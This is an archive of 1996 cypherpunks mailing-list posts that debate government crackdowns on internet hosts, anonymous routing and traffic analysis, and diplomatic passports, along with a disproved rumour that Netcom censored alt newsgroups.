From: attila <attila@primenet.com>
Date: Tue, 2 Jan 1996 04:20:10 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: SEY_use
In-Reply-To: <Pine.SUN.3.91.960101130852.20748E-100000@viper.law.miami.edu>
Message-ID: <Pine.BSD.3.91.960101191835.17743G-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    somewhere along the line, the body of your message was lost...

    the concept is interesting... diplomatic immunity is not automatic in 
that it implies diplomatic recognition.  does a rogue state enjoy the 
privilege of obviously bogus diplomatic passports?  the diplomatic 
passport is a "gentleman's agreement" to facilitate trading intelligence 
officers --sarcastic maybe, truthful?  been there, done that.

    if nothing else, the bearer of a diplomatic passport can be 
effectively forcing house arrest in the embassy/consulate while the
host government forces a recall --I hope the islands have a luxury 
hotel in every port of call.

    actually, I would be more interested in your comments on the wire
fraud charges used for an "insufficient" lab facility of a known 
microbiologist who happens to be a kook.  standard US procedural use
of conspiracy or wire fraud and/or conspiracy to force a plea bargain.
In return, we get more government bureaucracy, and probably government
review of credentials, or licensing.  academic freedom? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 14:09:06 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: Guerilla ISP's... (fwd)
Message-ID: <v02120d0aad0e58f96ea7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:16 1/1/96, Jim Choate wrote:

>Wow, you mean you can prosecute an operating system?

Well, you can seize the machine running the OS for the crimes it committed.
I am serious. No prosecution needed.

Prosecution followed by conviction is what will happen to the owner of the
computer on which the OS was running.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Tue, 2 Jan 1996 09:44:47 +0800
To: cypherpunks@toad.com
Subject: [local] Syracuse new york
Message-ID: <2.2.16.19960102011329.2e1723c0@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


Are their any interested people in having a meeting in the syr area?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 2 Jan 1996 10:38:00 +0800
To: cypherpunks@toad.com
Subject: Guerilla ISP's...
Message-ID: <199601020219.UAA00419@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Has anyone looked at operating systems like Plan 9 which divide the services
into 3 sets (terminal, file, process) and then distribute them over various
machines (and cpu's in multi-cpu systems) on a 'cost' basis? 

This would effectively address the issue of where named, httpd, or whatever
was running. Mainly because it would never run on the same machine (or cpu)
each time or necessarily all the time (ie run a while here then over there).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 3 Jan 1996 21:20:32 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <199601021621.IAA07942@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 PM 1/1/96 -0500, David Mandl wrote:
>I agree.  It's not a good idea to assume that there's going to be some kind
>of widespread opposition movement when the big Net Crackdown comes.  Most
>people will either obey the law, be unaffected by it, or violate it in very
>insignificant ways ("net jaywalking"). 

When printing was introduced in the west, the big print crackdown 
was successful, but there was great resistance, and the crackdown 
on the printed word required great and continuing violence over 
a long period, and was never entirely effective.

A net crackdown will be substantially less effective than the print 
crackdown was, and the level of violence is likely to be greater.

There is of course a tradeoff:  An highly ineffectual net crackdown 
will not provoke large scale resistance.  They can probably force
the stuff on alt.pictures.erotica.children to be published in a 
more discreet manner.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Felix Lee <flee@teleport.com>
Date: Wed, 3 Jan 1996 00:52:55 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <199601012358.RAA01029@einstein.ssz.com>
Message-ID: <199601020427.UAA16858@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green:
> Wrong. Only 0.03% of the home PCs have to be seized and the owners
> incarcerated. The remaining users will cease to carry controlled data on
> their own.

depends.  prohibition was a failure.  information is much easier to
duplicate and conceal, spy thrillers aside.  many people find it hard
to justify information being dangerous, especially if it's something
innocuous like just another cryptosystem, or just another penis.

compare with software piracy.  when was the last time a kid in your
neighborhood was busted for unlicensed copying of software?  and
software is big business, lots of suits and $$$.  they can try to make
disassemblers illegal, but it's not likely to succeed.

Jim Choate:
> If you live in the Austin, TX area I will setup a dedicated slip for you at
> only $100/mo.

in the Portland Oregon area, the price ranges from $234/year to
$1750/year for unlimited ppp access.  (I have no idea how long the
$234/year is going to stay in business.  that won't even cover the
cost of a phone line.)
--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Tue, 2 Jan 1996 18:41:06 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <v01530505ad0e412dd624@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:44 PM 1/1/96, Lucky Green wrote:
>At 15:32 1/1/96, Felix Lee wrote:
>>Lucky Green:
>>> Some site in physical space has to host the nntpd, the ftpd, and the httpd.
>>> That site will be subject to search, seizure, and arrest and conviction of
>>> owner.
>>
>>but if it turns out that 30% of home PCs have to be seized to prevent
>>dissemination of dangerous-information-X?
>
>Wrong. Only 0.03% of the home PCs have to be seized and the owners
>incarcerated. The remaining users will cease to carry controlled data on
>their own.

I agree.  It's not a good idea to assume that there's going to be some kind
of widespread opposition movement when the big Net Crackdown comes.  Most
people will either obey the law, be unaffected by it, or violate it in very
insignificant ways ("net jaywalking").  There's strength in numbers, but I
just don't think the numbers will be there.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem  <---Completely overhauled--tons of new stuff






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 2 Jan 1996 11:26:34 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla ISP's... (fwd)
Message-ID: <199601020316.VAA00545@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 1 Jan 1996 18:49:28 -0800
> From: shamrock@netcom.com (Lucky Green)
> Subject: Re: Guerilla ISP's...
> 
> At 20:19 1/1/96, Jim Choate wrote:
> >Has anyone looked at operating systems like Plan 9 which divide the services
> >into 3 sets (terminal, file, process) and then distribute them over various
> >machines (and cpu's in multi-cpu systems) on a 'cost' basis?
> >
> >This would effectively address the issue of where named, httpd, or whatever
> >was running. Mainly because it would never run on the same machine (or cpu)
> >each time or necessarily all the time (ie run a while here then over there).
> 
> That is called a conspiracy. The consequence is that all machines involved
> will be confiscated and their respective owners jailed.
> 

Wow, you mean you can prosecute an operating system?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 15:41:02 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Guerilla Internet Service Providers
Message-ID: <v02120d0cad0e6cd8a229@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:35 1/1/96, Jon Lasser wrote:

>More work needs to be done on untracable, yet at least modestly
>efficient, truly anonymous routing, even in a system where many of the
>participants, and perhaps even one of the endpoints, is or is willing to
>"cheat."

Time to bring up my favorite CP invention of the last years: Wai Dai's
Pipenet. Of course running Pipenet would be a felony in the future I
forsee, but it sure is a great idea.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 2 Jan 1996 15:43:15 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Guerilla ISP's... (fwd)
In-Reply-To: <v02120d0aad0e58f96ea7@[192.0.2.1]>
Message-ID: <199601020520.VAA24179@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Prosecution followed by conviction is what will happen to the owner of the
> computer on which the OS was running.
	It's hard to jail a corporation.

-- 
sameer						Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Tue, 2 Jan 1996 12:08:01 +0800
To: cypherpunks@toad.com
Subject: Paperclip original posting?
Message-ID: <2.2.32.19960102032915.00683458@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


could someone kindly forward me a copy of the original paperclip symbology
posting?  Thanks.
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 2 Jan 1996 06:15:43 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: SEY_use [NOISE]
In-Reply-To: <199601012027.PAA02788@nrk.com>
Message-ID: <Pine.BSD.3.91.960101211920.20146B-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 1 Jan 1996, David Lesher wrote:

> > 
> > 
> >     the concept is interesting... diplomatic immunity is not automatic in 
> > that it implies diplomatic recognition.  does a rogue state enjoy the 
> > privilege of obviously bogus diplomatic passports?  the diplomatic 
> > passport is a "gentleman's agreement" to facilitate trading intelligence 
> > officers --sarcastic maybe, truthful?  been there, done that.
> 
> A Dip Passport does nothing of the kind.
>
    come on, David. stated and "real" use are often quite different.
    I meant what I said, literally: "...been there, done that."

    it's nice to believe that governments are above board --they never
    have been, and never will be --and Bubba is a prime example.  I
    would buy a used car from Tricky Dick long before I would from Bubba!

    power is not only corruption, it is _deceit_!

    BTW, I do not disagree with your "protocol" in the slightest. PNG,
    and the trading of PNGs has been around ever since the French seemed
    to their language dominate foreign affairs --however, persona non
    gratis is rather explicit.

    and, I still wonder how the host country will treat "bogus" DPs 
    from rogue states if they have more DPs than real citizens. uncle
    has been getting less suble these days....
 
> You are awarded stutus by your placement by the host country, on their
> Diplomatic List. If you are there, fine; otherwise... Now, you'll never
> get on that list without a Dip. Passport & recipricol agreement but it's
> not enough...
> 
> Your name can be removed by the host at any time (PNG'ed) but some kind
> of warning is necessary so you can leave the host country prior to
> expiration of the status. (Not much, however! I recall one case where it
> was _literally_ "Be on the 4pm plane, or else.") If you are out of the
> country already, you won't be back. (One person was, and his cat became
> the ""PNG Pussy"" as she was shipped home the next day.)
> 
> The Dip List being out-of-date caused considerable embarrassment to the
> US during our invasion of Panama. Marines raided the Nicaraguan
> Ambassador's Residence because the out-of-date copy at the US Mission
> showed the _old_ address.
> 
> -- 
> A host is a host from coast to coast.................wb8foz@nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 2 Jan 1996 14:38:03 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <9601012017.AA15101@alpha>
Message-ID: <Z442gD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:
> For how long is this really going to be the case?  As the whole world
> of HTTP and related things (like Java & VRML) advances in capability
> and sophistication, how long will the Compuserve/AOL/Genie "Big Online
> Service" model continue to make sense?

For as long as they're able to provide information and services that
customers want, which are not available via "generic" small ISP's.

For example, one can read the New York Times (and many other periodicals)
via AOL; one can read the NCSA forum on CompuServe.

One has to be pretty dumb to use AOL or CS as an _Internet_ provider.
Yet a lot of very sharp people use these services.

The content providers aren't willing to put their wares on "generic"
internet, and won't be willing to in the foreseeable future.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clark Matthews" <clarkm@cnct.com>
Date: Tue, 2 Jan 1996 15:22:08 +0800
To: cypherpunks@toad.com
Subject: A weakness in PGP signatures, and a suggested solution
Message-ID: <199601020339.WAA15209@cnct.com>
MIME-Version: 1.0
Content-Type: text/plain



Just a note to Dr. Dmitri Vulis -- your post by this name appears to have 
been forge-cancelled on mail. cypherpunks 1/1/96 at 4:13 EST.  Two 
replies also forge-cancelled.

Anybody running lazarus on mail.cypherpunks?  Might be an interesting 
idea.

Dr. Vulis, can you repost the item to this list?

Best,  Clark

     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UU-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 2 Jan 1996 19:09:03 +0800
To: cypherpunks@toad.com
Subject: [Local] Portland OR Cypherpunks anyone?
Message-ID: <2.2.32.19960102063831.0091f620@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I am considering getting regular Cypherpunks meetings going in the Portland,
OR area.  If anyone is interested in such a thing, please drop me e-mail.

I have gotten some interest from a few friends and so I am sending out the
request to the rest of the list to see who else is interested.

Ideas for a local meeting place would also be appreciated, as my apartment
is way too small.  (And not the same time and place of the 2600 meetings.  I
am alergic to video cameras.)

It would also be a chance to meet some of the people I see on the list who I
know post from Portland...

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 2 Jan 1996 17:32:53 +0800
To: cypherpunks@toad.com
Subject: Re: Another Internet Provider Censors Access (fwd)
In-Reply-To: <Pine.SOL.3.91.960102013534.24106D-100000@use.usit.net>
Message-ID: <199601020701.XAA29889@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


An embarrassed Brad Dolan <bdolan@use.usit.net> writes:

 > Gulp. Sorry. That's the last time I believe anybody with a
 > name like "Y."

Netcom has not removed access to the alt groups, but they have
definitely screwed something up in the news system for the shell
machines.  Netcruiser accounts seem to work fine.

I just tried a test post to a bunch of alt.sex groups from Netcom
shell and it bounced instantly with the obnoxious message.

/usr/lib/newsbin/inject/injnews:alt.sex.girl.watchers,
alt.sex.graphics,alt.sex.hello-kitty,alt.sex.homosexual,
alt.sex.incest,alt.sex.intergen,alt.sex.magazines,
alt.sex.masturbation,alt.sex.pedophile.mike-labbe:
no groups in active file

/usr/lib/newsbin/inject/injnews: article in /u1/mpd/dead.article

/usr/lib/news/inews failed

Given Netcom's superb reputation for protecting free speech, It
is very unlikely this has anything to do with censorship.
Possibly someone encountered this glitch while trying to access
an alt group and jumped to conclusions.

Then again, maybe the Bavarians are running Netcom now. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jan 1996 17:31:53 +0800
To: sameer <sameer@c2.org>
Subject: Re: Guerilla ISP's... (fwd)
Message-ID: <v02120d01ad0e88295ae1@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:20 1/1/96, sameer wrote:
>> Prosecution followed by conviction is what will happen to the owner of the
>> computer on which the OS was running.
>        It's hard to jail a corporation.

Pretty hard. That's why the corporate officers will be jailed instead. Not
that this would be necessary to stop the corporation from operating.  The
authorities can just confiscating all the equipment and thereby put the
corporation out of business. Saves time and trial costs. They just haul off
the computers and declare that they are now property of the government.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@netcom.com (Matthew Ghio)
Date: Tue, 2 Jan 1996 17:34:07 +0800
To: cypherpunks@toad.com
Subject: Re: Another Internet Provider Censors Access (fwd)
In-Reply-To: <Pine.SOL.3.91.960102000200.10683A-100000@use.usit.net>
Message-ID: <199601020708.XAA23044@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Under the guise of a minor software upgrade, Netcom has changed
>its newsgroups access list to totally exclude "alt" groups
>altogether.  Since there is no way to sign up for a newsgroup
>other than via the selection menu that Netcom provides, it
>appears that Netcom has managed to censor access to all those
>discussion groups.

Can you say B-U-L-L-S-H-I-T ???

Man, this place is like a bunch of guerilla fighters preparing for war.
People are really on edge.  Make one wrong move and everybody starts
shooting.  I'm afraid that sooner or later it could be real bullets too.

BTW, Netcom splits its newsfeed between two servers.  Currently the
netcom.*, comp.*, and rec.* are all on one, and everything else is on the
other, although they move them around every few months.  Occasionally one
or the other server starts acting up, causing the respective heirarchies
to be temporarily inaccessable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 2 Jan 1996 17:34:35 +0800
To: bdolan@use.usit.net (Brad Dolan)
Subject: Re: Another Internet Provider Censors Access (fwd)
In-Reply-To: <Pine.SOL.3.91.960102000200.10683A-100000@use.usit.net>
Message-ID: <199601020708.XAA23593@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> ---------- Forwarded message ----------
> 
> Another shoe drops?
> 
> ---------- Forwarded message ----------
>  
> Under the guise of a minor software upgrade, Netcom has changed 
> its newsgroups access list to totally exclude "alt" groups 
> altogether.  Since there is no way to sign up for a newsgroup 
> other than via the selection menu that Netcom provides, it 
> appears that Netcom has managed to censor access to all those 
> discussion groups.
>  
    Not entirely.  From my shell account I just used Tin to view and
    subscribe to alt.sex and several others without a problem.
    Perhaps the above is true of their browser (NetCruiser) accounts?

    Bart




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@horten.artcom.de>
Date: Tue, 2 Jan 1996 07:05:53 +0800
To: shamrock@netcom.com
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <v02120d09ad0e047046b5@[192.0.2.1]>
Message-ID: <m0tWsjy-0002e4C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Lucky" == Lucky Green <shamrock@netcom.com> writes:

    Lucky> Some site in physical space has to host the nntpd, the
    Lucky> ftpd, and the httpd.  That site will be subject to search,
    Lucky> seizure, and arrest and conviction of owner.

So I guess we'll need some computers in outer space, on offshore boats
or in well-bribed stable dictatorships.

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMOhgZ0yjTSyISdw9AQEfggP+N2p9/ar1Z9gFFlpwAUf21YX0jd8XeU7Z
jzgUWP5n/A4udka4T6sqLef1gu68BxEQYGBe3ZUQmV286xcyouelg2OTfriGRh/j
E2rpl7EO1kyUrK3zbDU5OSglmHBI9kJzLK8fs+gyhyLiu3t9MeFf9ydgJ45BmIuj
ztZbMPrvhJc=
=XW6V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 3 Jan 1996 00:56:41 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <v02120d09ad0e047046b5@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.960101232424.12745A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 1 Jan 1996, Lucky Green wrote:

> At 15:14 1/1/96, Mike McNally wrote:
> >Lucky Green writes:
> > > But how many of them [ IP providers ] will be willing to forward
> > > certain newsgroups if doing so carries a mandatory 10 year prison
> > > term? Hint: count the number of  narcotics dealers that advertize
> > > in your local yellow pages.
> >
> >But an IP provider doesn't have to know that it's "forwarding" *any*
> >newsgroups; all it has to know is that IP packets are moving between
> >my PC and the outside world.  It doesn't have any way of knowing what
> >those packets contain and doesn't want to.
> 
> Some site in physical space has to host the nntpd, the ftpd, and the httpd.
> That site will be subject to search, seizure, and arrest and conviction of
> owner.
> 
> If you don't have a host, there won't be any packets to forward.

This is _exactly_ where the transnational nature of the Internet becomes 
successful, when combined with strong crypto. If the sites coming into 
your machine are encrypted, nobody outside of your system (perhaps only 
you) know that said newsgroups, websites, etc. are being hit. If the site 
they originate from is determined to be offshore, they can't stop the 
site. Probably. Subject, at least, to foreign cooperation or direct 
CIA/NSA involvement.

The potential for traffic analysis is the danger here. If an "FBI 
International Data Laundering Expert" testifies in court that said data 
came from a site known to be frequented solely by so-and-sos, all the 
strong crypto in the world won't stop the average jury from convicting you.

Carl Ellison (among others, I'm sure) has suggested various means of 
foiling traffic analysis among a group of trusted conspirators, using a 
token-ring-like routing scheme. I'm not completely convinced that it's 
robust enough, but a variation on it is probably adaptable.

The point-to-point nature of the internet is also its achilles heel, as 
far as traffic analysis is concerned... the troubles faced by traditional 
cypherpunk remailers, the generalized problem of anonymous message 
distribution, and such are the current limits of consideration on the 
list (as far as I'm thinking right now... I may be wrong).  However, the 
problem of, say, webservers collecting statistics on users, would be moot 
should it be possible for truly anonymous websurfing (I'm convinced that 
traditional http proxies have the same flaws as traditional cypherpunk 
remailers).

More work needs to be done on untracable, yet at least modestly 
efficient, truly anonymous routing, even in a system where many of the 
participants, and perhaps even one of the endpoints, is or is willing to 
"cheat."

Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 3 Jan 1996 00:53:53 +0800
To: cypherpunks@toad.com
Subject: Another Internet Provider Censors Access (fwd)
Message-ID: <Pine.SOL.3.91.960102000200.10683A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------


Another shoe drops?

---------- Forwarded message ----------

Date: Mon, 1 Jan 1996 19:44:30 -0600
From: x
To: y

Y -
 
Coming off CompuServe's announcement last week that it was 
cutting off all access to "alt.binaries" newsgroups under 
pressure from the German government, I'm passing along another 
apparent development from another Internet access provider, 
Netcom.
 
Under the guise of a minor software upgrade, Netcom has changed 
its newsgroups access list to totally exclude "alt" groups 
altogether.  Since there is no way to sign up for a newsgroup 
other than via the selection menu that Netcom provides, it 
appears that Netcom has managed to censor access to all those 
discussion groups.
 
We are witnessing the not-so-gradual erosion of freedom of the 
Net.  I not often find myself allied with John Perry Barlow, but 
on this one we are four-square:  what with stupid attempts of 
government to pass unconstitutional restrictions, and 
acquiescence of the private sector to intimidation and pressure, 
freedoms of the many are being dictated by reactionary elements 
in places like Memphis, Tennessee.  
 
The next opportunity, I expect, will be to help underwrite the 
defense of the first criminal action brought under the new law.  
In the meantime, we can unsubscribe to services that curtail our 
liberties.
 
"X"
Speaking solely for myself, this time.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Tue, 2 Jan 1996 16:47:32 +0800
To: bdolan@use.usit.net (Brad Dolan)
Subject: Re: Another Internet Provider Censors Access (fwd)
In-Reply-To: <Pine.SOL.3.91.960102000200.10683A-100000@use.usit.net>
Message-ID: <199601020615.AAA12494@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Under the guise of a minor software upgrade, Netcom has changed 
> its newsgroups access list to totally exclude "alt" groups 
> altogether.  Since there is no way to sign up for a newsgroup 
> other than via the selection menu that Netcom provides, it 
> appears that Netcom has managed to censor access to all those 
> discussion groups.

Really?  A quick check shows that alt. groups, even the alt.sex.* groups, 
are still in /usr/lib/news/active, and articles are still in 
/usr/spool/news/alt/sex/*.

Whoever supplied that information is apparently wrong.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOjNciS9AwzY9LDxAQE74gP+MD9vqln8W/55QXW7IgBosZkWu0923Wp/
8il41W2xhJEv7/DYcDjzMAZZKK1/F5Nwl6rv1mqxzUGP6UJg60RC3w6+Q9Pnr5R3
i7DJ0IO8LryJOFMFrIT9RAKLdwjic7NjglksD8rWjHJP14XV2m1R8xToGMtFeE+T
Y8VWdh98ZXM=
=V6vA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Tue, 2 Jan 1996 16:46:37 +0800
To: flee@teleport.com
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <199601020427.UAA16858@desiree.teleport.com>
Message-ID: <9601020613.AA28127@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 01 Jan 1996 20:27:23 -0800
   From: Felix Lee <flee@teleport.com>
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   compare with software piracy.  when was the last time a kid in your
   neighborhood was busted for unlicensed copying of software?  and
   software is big business, lots of suits and $$$.  

Look for this to change if the copyright "high-protectionists" succeed
in getting Congress to criminalize every act of copyright infringement,
which is what the Leahy-Feingold "Criminal Copyright Improvement Act of
1995" (S.1122) will do if it becomes law.  Under current copyright law
infringements that are not committed wilfully and "for purposes of
commercial advantage or private financial gain" are not criminal.  Such
non-profit/noncommercial infringements are still civil infringements,
and copyright holders may sue for actual and/or statutory damages, but
since the typical kid has net assets less than $39.95 it's not worth the
effort.  If S.1122 becomes law, though, the software companies (or other
copyright holders) will be able to get the Feds to prosecute such cases
criminally (so we, as taxpayers, get to foot the bill for those
prosecutions that are not monetarily attractive to the copyright
holders).

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 2 Jan 1996 17:13:46 +0800
To: ecarp@netcom.com
Subject: Re: Another Internet Provider Censors Access (fwd)
In-Reply-To: <199601020615.AAA12494@dal1820.computek.net>
Message-ID: <Pine.SOL.3.91.960102013534.24106D-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Gulp.

Sorry.

That's the last time I believe anybody with a name like "Y."

bd

On Tue, 2 Jan 1996, Ed Carp [khijol SysAdmin] wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> > Under the guise of a minor software upgrade, Netcom has changed 
> > its newsgroups access list to totally exclude "alt" groups 
> > altogether.  Since there is no way to sign up for a newsgroup 
> > other than via the selection menu that Netcom provides, it 
> > appears that Netcom has managed to censor access to all those 
> > discussion groups.
> 
> Really?  A quick check shows that alt. groups, even the alt.sex.* groups, 
> are still in /usr/lib/news/active, and articles are still in 
> /usr/spool/news/alt/sex/*.
> 
> Whoever supplied that information is apparently wrong.
> - --
> Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
> 					214/993-3935 voicemail/digital pager
> 					800/558-3408 SkyPager
> Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
> 
> "Past the wounds of childhood, past the fallen dreams and the broken families,
> through the hurt and the loss and the agony only the night ever hears, is a
> waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
> asks only one thing of you ... 'Remember who it is you really are.'"
> 
>                     -- "Losing Your Mind", Karen Alexander and Rick Boyes
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMOjNciS9AwzY9LDxAQE74gP+MD9vqln8W/55QXW7IgBosZkWu0923Wp/
> 8il41W2xhJEv7/DYcDjzMAZZKK1/F5Nwl6rv1mqxzUGP6UJg60RC3w6+Q9Pnr5R3
> i7DJ0IO8LryJOFMFrIT9RAKLdwjic7NjglksD8rWjHJP14XV2m1R8xToGMtFeE+T
